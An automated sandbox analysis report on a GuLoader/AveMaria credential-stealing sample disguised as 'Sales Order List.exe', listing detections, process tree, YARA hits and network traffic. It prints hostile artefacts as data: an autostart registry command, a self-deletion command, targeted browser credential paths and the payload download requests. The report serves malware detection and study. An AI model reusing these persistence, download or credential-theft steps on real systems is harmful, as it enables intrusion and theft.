Loading ...

Play interactive tourEdit tour

Windows Analysis Report Sales Order List.exe

Overview

General Information

Sample Name:Sales Order List.exe
Analysis ID:526595
MD5:80bad0903ee7ec98805678673720cfd9
SHA1:35aecf6fe3ac24adaf16c04b787e90ac4c845eb0
SHA256:260e6b75d7616efd29c05151f1ce95bbab1aaf8703f86f62c4d9bc6d308a56b8
Infos:

Most interesting Screenshot:

Detection

GuLoader AveMaria
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AveMaria stealer
GuLoader behavior detected
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to detect Any.run
Increases the number of concurrent connection per server for Internet Explorer
Contains functionality to hide user accounts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Creates an undocumented autostart registry key
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Sigma detected: Direct Autorun Keys Modification
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to detect virtual machines (SLDT)
Uses reg.exe to modify the Windows registry
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • Sales Order List.exe (PID: 5788 cmdline: "C:\Users\user\Desktop\Sales Order List.exe" MD5: 80BAD0903EE7EC98805678673720CFD9)
    • Sales Order List.exe (PID: 6892 cmdline: "C:\Users\user\Desktop\Sales Order List.exe" MD5: 80BAD0903EE7EC98805678673720CFD9)
      • explorer.exe (PID: 4576 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
      • cmd.exe (PID: 6232 cmdline: cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 4904 cmdline: REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • images.exe (PID: 4192 cmdline: C:\ProgramData\images.exe MD5: 80BAD0903EE7EC98805678673720CFD9)
        • WerFault.exe (PID: 4220 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 740 MD5: 40A149513D721F096DDF50C04DA2F01F)
        • WerFault.exe (PID: 3440 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 772 MD5: 40A149513D721F096DDF50C04DA2F01F)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=downloads;R"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.125547203981.00000000022E0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    0000000F.00000000.125996962988.0000000002330000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      0000000F.00000000.125886367131.0000000002330000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        00000004.00000000.125545111088.0000000001660000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          0000000F.00000000.125990940523.0000000002330000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 14 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.3.Sales Order List.exe.18f3e10.3.raw.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
            • 0x3100:$a1: \Opera Software\Opera Stable\Login Data
            • 0x3428:$a2: \Comodo\Dragon\User Data\Default\Login Data
            • 0x2d70:$a3: \Google\Chrome\User Data\Default\Login Data
            4.3.Sales Order List.exe.18f3e10.3.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              4.3.Sales Order List.exe.18f3e10.3.raw.unpackJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
                4.3.Sales Order List.exe.18f3e10.3.raw.unpackAveMaria_WarZoneunknownunknown
                • 0x51a8:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
                • 0x4efc:$str2: MsgBox.exe
                • 0x4dd0:$str6: Ave_Maria
                • 0x4470:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                • 0x3a90:$str8: SMTP Password
                • 0x2d70:$str11: \Google\Chrome\User Data\Default\Login Data
                • 0x4448:$str12: \sqlmap.dll
                4.3.Sales Order List.exe.18f3e10.7.raw.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x3100:$a1: \Opera Software\Opera Stable\Login Data
                • 0x3428:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x2d70:$a3: \Google\Chrome\User Data\Default\Login Data
                Click to see the 3 entries

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: Direct Autorun Keys ModificationShow sources
                Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe", CommandLine: REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6232, ProcessCommandLine: REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe", ProcessId: 4904

                Jbx Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Found malware configurationShow sources
                Source: 00000002.00000002.125547203981.00000000022E0000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=downloads;R"}
                Multi AV Scanner detection for submitted fileShow sources
                Source: Sales Order List.exeReversingLabs: Detection: 40%
                Yara detected AveMaria stealerShow sources
                Source: Yara matchFile source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000003.125765591469.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.125766752022.00000000018F2000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.125766920138.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.125766406921.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.125766059758.00000000018F2000.00000004.00000001.sdmp, type: MEMORY
                Multi AV Scanner detection for dropped fileShow sources
                Source: C:\ProgramData\images.exeReversingLabs: Detection: 40%
                Source: 4.3.Sales Order List.exe.18f3e10.7.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                Source: 4.3.Sales Order List.exe.18f3e10.3.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                Source: Sales Order List.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.11.20:49806 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49807 version: TLS 1.2
                Source: C:\Users\user\Desktop\Sales Order List.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
                Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126024539923.00000000068B8000.00000004.00000001.sdmp
                Source: Binary string: Kernel.Appcore.pdb( source: WerFault.exe, 00000014.00000003.125904782894.0000000005CEB000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126018047691.0000000006475000.00000004.00000001.sdmp
                Source: Binary string: wgdi32full.pdb( source: WerFault.exe, 00000014.00000003.125904003059.0000000002DFC000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126008791375.00000000033D5000.00000004.00000001.sdmp
                Source: Binary string: coml2.pdb6H&8e source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp
                Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000014.00000003.125899753643.0000000002D6E000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009250720.000000000334B000.00000004.00000001.sdmp
                Source: Binary string: ntmarta.pdb( source: WerFault.exe, 00000014.00000003.125910819500.0000000005D29000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126023579033.00000000068B2000.00000004.00000001.sdmp
                Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126008890066.00000000033E0000.00000004.00000001.sdmp
                Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000014.00000003.125905933053.0000000005C3F000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
                Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126013564666.00000000033F7000.00000004.00000001.sdmp
                Source: Binary string: wntdll.pdb source: WerFault.exe, 00000014.00000003.125899753643.0000000002D6E000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126033173702.0000000005431000.00000004.00000001.sdmp
                Source: Binary string: shcore.pdb$H48s source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp
                Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 00000014.00000003.125913249873.0000000005D18000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126017165802.000000000649F000.00000004.00000001.sdmp
                Source: Binary string: shcore.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
                Source: Binary string: apphelp.pdb( source: WerFault.exe, 00000014.00000003.125903738538.0000000002D80000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009354250.0000000003358000.00000004.00000001.sdmp
                Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000014.00000003.125905520713.0000000002DF6000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126033269253.0000000005520000.00000004.00000040.sdmp
                Source: Binary string: oleaut32.pdb( source: WerFault.exe, 00000014.00000003.125909078051.0000000005CE0000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126012936139.000000000646A000.00000004.00000001.sdmp
                Source: Binary string: advapi32.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126010636897.00000000033E6000.00000004.00000001.sdmp
                Source: Binary string: ucrtbase.pdb( source: WerFault.exe, 00000014.00000003.125905831080.0000000005C34000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126008890066.00000000033E0000.00000004.00000001.sdmp
                Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000014.00000003.125910819500.0000000005D29000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126023579033.00000000068B2000.00000004.00000001.sdmp
                Source: Binary string: coml2.pdb( source: WerFault.exe, 00000017.00000003.126018806279.000000000648C000.00000004.00000001.sdmp
                Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126008843786.00000000033DB000.00000004.00000001.sdmp
                Source: Binary string: wimm32.pdb( source: WerFault.exe, 00000014.00000003.125904733671.0000000005CE6000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126016753163.0000000006470000.00000004.00000001.sdmp
                Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000014.00000003.125900100057.0000000002D6E000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009302903.0000000003351000.00000004.00000001.sdmp
                Source: Binary string: wimm32.pdb source: WerFault.exe, 00000014.00000003.125904733671.0000000005CE6000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126016753163.0000000006470000.00000004.00000001.sdmp
                Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 00000014.00000003.125915266650.0000000005D13000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126022235396.0000000006499000.00000004.00000001.sdmp
                Source: Binary string: TextShaping.pdb source: WerFault.exe, 00000014.00000003.125917002362.0000000006562000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009302903.0000000003351000.00000004.00000001.sdmp
                Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000014.00000003.125927969397.0000000005260000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126008696474.00000000033CA000.00000004.00000001.sdmp
                Source: Binary string: oleaut32.pdbQ source: WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
                Source: Binary string: CoreMessaging.pdb( source: WerFault.exe, 00000014.00000003.125913249873.0000000005D18000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126017165802.000000000649F000.00000004.00000001.sdmp
                Source: Binary string: sxs.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
                Source: Binary string: bcryptprimitives.pdb( source: WerFault.exe, 00000014.00000003.125909199577.0000000005CF1000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126016848001.000000000647B000.00000004.00000001.sdmp
                Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126019837993.000000000613C000.00000004.00000001.sdmp
                Source: Binary string: sechost.pdb( source: WerFault.exe, 00000014.00000003.125905988617.0000000005C45000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126010047688.00000000033F1000.00000004.00000001.sdmp
                Source: Binary string: combase.pdb( source: WerFault.exe, 00000014.00000003.125907854720.0000000002E1D000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126010408748.00000000060E2000.00000004.00000001.sdmp
                Source: Binary string: CoreUIComponents.pdb( source: WerFault.exe, 00000014.00000003.125915266650.0000000005D13000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126022235396.0000000006499000.00000004.00000001.sdmp
                Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000014.00000003.125899753643.0000000002D6E000.00000004.00000001.sdmp
                Source: Binary string: msvcrt.pdb( source: WerFault.exe, 00000014.00000003.125905933053.0000000005C3F000.00000004.00000001.sdmp
                Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000014.00000003.125917746027.0000000005D1E000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
                Source: Binary string: advapi32.pdb( source: WerFault.exe, 00000014.00000003.125907125589.0000000005C3A000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126010636897.00000000033E6000.00000004.00000001.sdmp
                Source: Binary string: coml2.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126018806279.000000000648C000.00000004.00000001.sdmp
                Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126008791375.00000000033D5000.00000004.00000001.sdmp
                Source: Binary string: WinTypes.pdb( source: WerFault.exe, 00000017.00000003.126024539923.00000000068B8000.00000004.00000001.sdmp
                Source: Binary string: sechost.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126010047688.00000000033F1000.00000004.00000001.sdmp
                Source: Binary string: ws2_32.pdb8H 8 source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp
                Source: Binary string: wrpcrt4.pdb( source: WerFault.exe, 00000017.00000003.126013564666.00000000033F7000.00000004.00000001.sdmp
                Source: Binary string: msctf.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126021040208.0000000006486000.00000004.00000001.sdmp
                Source: Binary string: ,wntdll.pdb source: WerFault.exe, 00000014.00000003.125899412774.0000000002D70000.00000004.00000001.sdmp
                Source: Binary string: wwin32u.pdb( source: WerFault.exe, 00000017.00000003.126008696474.00000000033CA000.00000004.00000001.sdmp
                Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 00000014.00000003.125910630742.0000000005D0D000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126022159017.0000000006493000.00000004.00000001.sdmp
                Source: Binary string: ole32.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
                Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126018047691.0000000006475000.00000004.00000001.sdmp
                Source: Binary string: TextShaping.pdb( source: WerFault.exe, 00000014.00000003.125917002362.0000000006562000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126023187158.00000000068BD000.00000004.00000001.sdmp
                Source: Binary string: ws2_32.pdb( source: WerFault.exe, 00000014.00000003.125917746027.0000000005D1E000.00000004.00000001.sdmp
                Source: Binary string: wUxTheme.pdb( source: WerFault.exe, 00000017.00000003.126019837993.000000000613C000.00000004.00000001.sdmp
                Source: Binary string: wgdi32.pdb( source: WerFault.exe, 00000014.00000003.125905520713.0000000002DF6000.00000004.00000001.sdmp
                Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000014.00000003.125909199577.0000000005CF1000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126016848001.000000000647B000.00000004.00000001.sdmp
                Source: Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: Sales Order List.exe, 00000004.00000003.125766201878.000000001F5C1000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.125849081972.000000000EA70000.00000040.00000001.sdmp
                Source: Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: Sales Order List.exe, 00000004.00000003.125766201878.000000001F5C1000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.125849081972.000000000EA70000.00000040.00000001.sdmp
                Source: Binary string: msctf.pdb( source: WerFault.exe, 00000014.00000003.125910562779.0000000005D02000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126021040208.0000000006486000.00000004.00000001.sdmp
                Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000014.00000003.125903704223.0000000002D7B000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009302903.0000000003351000.00000004.00000001.sdmp
                Source: Binary string: combase.pdb source: WerFault.exe, 00000014.00000003.125907854720.0000000002E1D000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126010408748.00000000060E2000.00000004.00000001.sdmp
                Source: Binary string: wuser32.pdb( source: WerFault.exe, 00000014.00000003.125905424783.0000000002DEB000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126008630763.00000000033C4000.00000004.00000001.sdmp
                Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000014.00000003.125903667098.0000000002D75000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009250720.000000000334B000.00000004.00000001.sdmp
                Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126012936139.000000000646A000.00000004.00000001.sdmp
                Source: Binary string: coml2.pdb} source: WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
                Source: Binary string: TextInputFramework.pdb( source: WerFault.exe, 00000014.00000003.125910630742.0000000005D0D000.00000004.00000001.sdmp
                Source: Binary string: apphelp.pdb source: WerFault.exe, 00000014.00000003.125927969397.0000000005260000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126009354250.0000000003358000.00000004.00000001.sdmp
                Source: Binary string: wuser32.pdb source: WerFault.exe, 00000014.00000003.125905424783.0000000002DEB000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126008630763.00000000033C4000.00000004.00000001.sdmp
                Source: Binary string: ole32.pdb( source: WerFault.exe, 00000014.00000003.125907817675.0000000002E17000.00000004.00000001.sdmp
                Source: Binary string: msvcp_win.pdb( source: WerFault.exe, 00000014.00000003.125904042199.0000000002E01000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126008843786.00000000033DB000.00000004.00000001.sdmp

                Networking:

                barindex
                C2 URLs / IPs found in malware configurationShow sources
                Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=downloads;R
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Joe Sandbox ViewIP Address: 93.184.220.29 93.184.220.29
                Source: Joe Sandbox ViewIP Address: 93.184.220.29 93.184.220.29
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=14riMs-By6HjEY7hTtEKf9cx7RhIUcVvn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/145unl5irik8qdpdmfh83ttj403osrln/1637606400000/11605847516605788748/*/14riMs-By6HjEY7hTtEKf9cx7RhIUcVvn?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0k-48-docs.googleusercontent.comConnection: Keep-Alive
                Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: Sales Order List.exe, 00000004.00000003.125873230933.00000000018A9000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000002.125984504149.0000000005CE1000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000002.126063872302.0000000003308000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: Sales Order List.exe, 00000004.00000003.125873230933.00000000018A9000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000002.125984504149.0000000005CE1000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000002.126063872302.0000000003308000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: explorer.exe, 0000000B.00000000.125799531795.0000000010A6D000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                Source: explorer.exe, 0000000B.00000002.130410544642.000000000CFBC000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%
                Source: explorer.exe, 0000000B.00000000.125799531795.0000000010A6D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                Source: explorer.exe, 0000000B.00000002.130379831569.0000000000904000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
                Source: explorer.exe, 0000000B.00000002.130410016644.000000000CF7B000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                Source: explorer.exe, 0000000B.00000000.125786547597.000000000A940000.00000002.00020000.sdmpString found in binary or memory: http://schemas.micro
                Source: Sales Order List.exeString found in binary or memory: http://topqualityfreeware.com
                Source: Amcache.hve.LOG1.20.drString found in binary or memory: http://upx.sf.net
                Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmpString found in binary or memory: http://www.foreca.com
                Source: Sales Order List.exeString found in binary or memory: http://www.topqualityfreeware.com/
                Source: explorer.exe, 0000000B.00000002.130415876105.0000000010478000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppEM
                Source: explorer.exe, 0000000B.00000000.125824449017.0000000002E75000.00000004.00000001.sdmpString found in binary or memory: https://aka.ms/odirme
                Source: explorer.exe, 0000000B.00000002.130409357270.000000000CEEE000.00000004.00000001.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                Source: explorer.exe, 0000000B.00000000.125824045068.0000000002E1A000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com/
                Source: explorer.exe, 0000000B.00000002.130406454585.000000000CBA2000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: explorer.exe, 0000000B.00000002.130396156143.0000000009501000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
                Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
                Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                Source: explorer.exe, 0000000B.00000000.125782425758.00000000093FE000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?P
                Source: explorer.exe, 0000000B.00000002.130396156143.0000000009501000.00000004.00000001.sdmpString found in binary or memory: https://arc.msn.com
                Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
                Source: explorer.exe, 0000000B.00000000.125845469977.000000000CF00000.00000004.00000001.sdmpString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivation
                Source: explorer.exe, 0000000B.00000002.130379831569.0000000000904000.00000004.00000020.sdmpString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivations
                Source: Sales Order List.exe, 00000004.00000003.125743274575.00000000018B4000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
                Source: Sales Order List.exe, 00000004.00000003.125743274575.00000000018B4000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
                Source: Sales Order List.exeString found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/
                Source: Sales Order List.exe, 00000004.00000003.125871810697.0000000001879000.00000004.00000001.sdmpString found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/%%doc-0k-48-docs.googleusercontent.com
